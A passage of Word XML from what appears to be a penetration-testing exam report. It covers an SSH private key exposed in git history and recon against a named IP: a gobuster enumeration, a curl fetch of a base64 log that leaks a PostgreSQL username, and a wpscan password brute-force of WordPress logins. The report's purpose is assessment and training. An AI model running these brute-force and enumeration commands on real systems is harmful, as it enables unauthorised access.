        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Inspected commit history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Located the key in a file that was removed in a commit named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>fix</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Screenshot taken as proof (see below).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Risk:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Exposure of a private key enables full unauthorized access to any server trusting the corresponding public key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Since the public key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>id_rsa.pub</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> is also present in the repo, this proves that both parts of the key pair were exposed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This alone constitutes a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>critical vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and fulfills the primary exam objective.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Revoke all SSH access using this key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Rotate any systems that trusted it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Audit the entire GitLab repo and use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.gitignore</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> to avoid committing secrets in the future.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Screenshot Proof:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rP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6624320" cy="335089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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6624320" cy="33508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before="80" w:after="120"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Eop"/>
        </w:rPr>
        <w:t xml:space="preserve">Writeup  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>This is the write-up section. Here, you can explain your exam engagement in open format. Screenshots and outputs from tools are allowed. Good formatting and detailed explanations can increase your overall points, however, bad formatting and poor explanations can decrease your overall points.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri" w:cstheme="minorHAnsi" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Step-by-Step Summary of My Reconnaissance Process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">🔍 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Step 1: Initial Scanning and Passive Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>I started with passive fingerprinting of the target:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Accessed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>http://185.218.124.165/</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> manually and located the main web application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Identified the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>search_query=</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> parameter vulnerable to reflection, which led to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>HTML Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Reflected XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">🧭 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Step 2: Directory Enumeration with Gobuster</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> to brute-force directories and file types with common extensions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="80" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>gobuster dir -u http://185.218.124.165 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,log,bak,zip -t 30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Discovered:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/index.php</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> – main application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/z</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> – Base64-encoded log file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">🧾 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Step 3: Base64 Log File Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Downloaded and decoded the file found at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/z</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>curl -s http://185.218.124.165/z -o encoded.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="80" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>cat encoded.txt | base64 -d &gt; decoded.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Inside the log:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">PostgreSQL credentials: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>softuniblogadmin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>GitLab activity and system information (CPU, RAM, backups)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Logins and environment metadata</w:t>
        <w:br/>
        <w:t>✅ This gave me the lead to investigate GitLab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">🛠️ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Step 4: WordPress CMS Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The web application on port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> runs WordPress:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Initially accessible at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/wp-admin/install.php</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, suggesting it was uninitialized (Critical Risk).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Later configured, but still vulnerable to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>brute-force login</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/wp-login.php</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>No CAPTCHA, IP lockout, or rate limiting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Attempted brute-force with:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="80" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>wpscan --url http://185.218.124.165:8080 -U hgdsfsdasd -P /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Eventually blocked with:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>pgsql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="80" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>Error: No response from remote server. WAF/IPS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
